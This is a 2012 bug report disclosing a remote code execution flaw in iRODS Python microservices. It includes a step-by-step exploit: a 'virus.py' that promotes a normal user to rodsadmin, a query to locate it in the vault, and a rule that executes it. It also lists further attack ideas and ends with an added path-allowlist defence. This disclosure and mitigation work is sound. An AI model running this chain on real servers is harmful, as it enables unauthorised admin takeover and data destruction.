security flaw: remote code invocation  #11

@GoogleCodeExporter

Prerequisites:
*) access to a remote iRODS server (with normal user rights)
**) the remote server must have pyrods and embedPython installed

Those two are enough to do remote code invocation and call any Linux
command (or set of commands) on the remote machine with the rights of
the user the iRODS server is running as.
In a typical installation, the icommands are also installed on the remote
server and the credentials for irodsadmin are created in
~/.irods/.irodsEnv. In the following we will show how this can be used
to escalate rights in iRODS and upgrade the normal user from (*) to
irodsadmin on the remote server.

1) create virus.py:

```python
import subprocess

# called by the Python microservice with the rule-engine context `rei`
def test_python(rei):
    subprocess.call(["iadmin", "moduser", "testuser2", "type", "rodsadmin"])
```

testuser2 should be the user name on the remote server (*)

2) upload it to a remote irods (iput virus.py)

3) find out the physical path of the uploaded file:

```
iquest "%s" "select DATA_PATH where DATA_NAME like '%virus.py%'"
```

4) run a rule from a local machine:

```
testPythoni () {
  msiPyInitialize();
  msiLocalPython(*pyScript, *methName, "noRecursionTest");
  msiPyFinalize();
}
INPUT *pyScript="/opt/irods/data/home/testuser2/virus.py",
*methName="test_python"
OUTPUT ruleExecOut
```

where *pyScript points to the physical location obtained in step 3)

U-HA you are the admin!

The issue is: Python microservices allow calling any Python script on the
server if only the physical path to that file is known. This can be found out by
issuing an iCAT query.
Please note that msiExecCmd (the standard microservice provided by iRODS to run
bash scripts) only allows running scripts located in a special directory on the
server, so it is not possible to first upload such a script with iput and
then run it with irule.

This is only an example of what you can do if you can program Python better
than me:
- find where core.re is located on the remote machine and add some
content there (admin rules)
- try to access the iCAT database; could be possible e.g. with "isql ICAT"
- change the Linux password of the user running the iRODS server, or create a new
user and log in to the shell
- remove the iRODS server or the data store

Original issue reported on code.google.com by ryba...@gmail.com on 27 Jul 2012 at 8:12
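Added example, not from the report and not iRODS code: the mitigation the report itself points at is the msiExecCmd behaviour of only running scripts from an admin-controlled directory. The check below applies the same idea to the script path a msiLocalPython-style microservice receives. It resolves symlinks before deciding, compares on path components rather than string prefixes, and refuses anything that resolves into the vault (the client-writable tree that `iput` lands in, seen as `/opt/irods/data/...` in the report's iquest output). The directory names, the `path_within` / `check_script_path` helpers and the `realpath` parameter are assumptions for illustration.

```python
"""Allowlist check for server-side script paths (added example).

Idea: a microservice that executes a script by path must only accept paths
under an admin-controlled directory, never a physical path inside the iRODS
vault, because any normal user can place a file there with `iput` and learn
its DATA_PATH via an iCAT query.
"""
import os

# Constructed configuration, not iRODS's own settings.
ALLOWED_SCRIPT_DIR = "/srv/irods/msiScripts"  # hypothetical admin-only directory
VAULT_ROOT = "/opt/irods/data"                # vault prefix seen in the report


def path_within(candidate, root):
    """True if `candidate` is `root` itself or lies below it.

    Both paths are normalised so '..' segments cannot walk out of `root`,
    and containment is tested on a trailing-separator boundary, so a sibling
    such as '/srv/irods/msiScripts-evil' is not mistaken for the allowed tree.
    This is a lexical check only; resolve symlinks before calling it.
    """
    cand = os.path.normpath(candidate)
    base = os.path.normpath(root)
    return cand == base or cand.startswith(base.rstrip(os.sep) + os.sep)


def check_script_path(requested, allowed_dir=ALLOWED_SCRIPT_DIR,
                      vault_root=VAULT_ROOT, realpath=os.path.realpath):
    """Return (ok, detail): detail is the resolved path when ok, else a reason.

    `realpath` is injectable (assumption for testing) so a symlink planted in
    the allowed directory can be simulated without touching the filesystem.
    """
    if not os.path.isabs(requested):
        return False, "relative path rejected"
    resolved = realpath(requested)          # follow symlinks first
    if path_within(resolved, vault_root):
        return False, "resolves into the data vault (client-writable)"
    if not path_within(resolved, allowed_dir):
        return False, "outside the allowed script directory"
    if not resolved.endswith(".py"):
        return False, "not a .py file"
    return True, resolved


if __name__ == "__main__":
    # Constructed candidates: one legitimate script, the report's vault path,
    # a traversal attempt and a symlink (simulated) back into the vault.
    fake_link = {"/srv/irods/msiScripts/link.py":
                 "/opt/irods/data/home/testuser2/virus.py"}
    for path in ("/srv/irods/msiScripts/report.py",
                 "/opt/irods/data/home/testuser2/virus.py",
                 "/srv/irods/msiScripts/../../../opt/irods/data/home/testuser2/virus.py",
                 "/srv/irods/msiScripts/link.py"):
        ok, detail = check_script_path(path, realpath=lambda p: fake_link.get(p, p))
        print(f"{'ALLOW' if ok else 'DENY '} {path} -> {detail}")
```

The traversal case is caught because `normpath` collapses the `..` segments before the containment test, and the symlink case is caught because resolution happens before the vault check rather than after it. In a real deployment the allowed directory must also not be writable by the iRODS service account itself, otherwise a code execution path elsewhere could still populate it.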
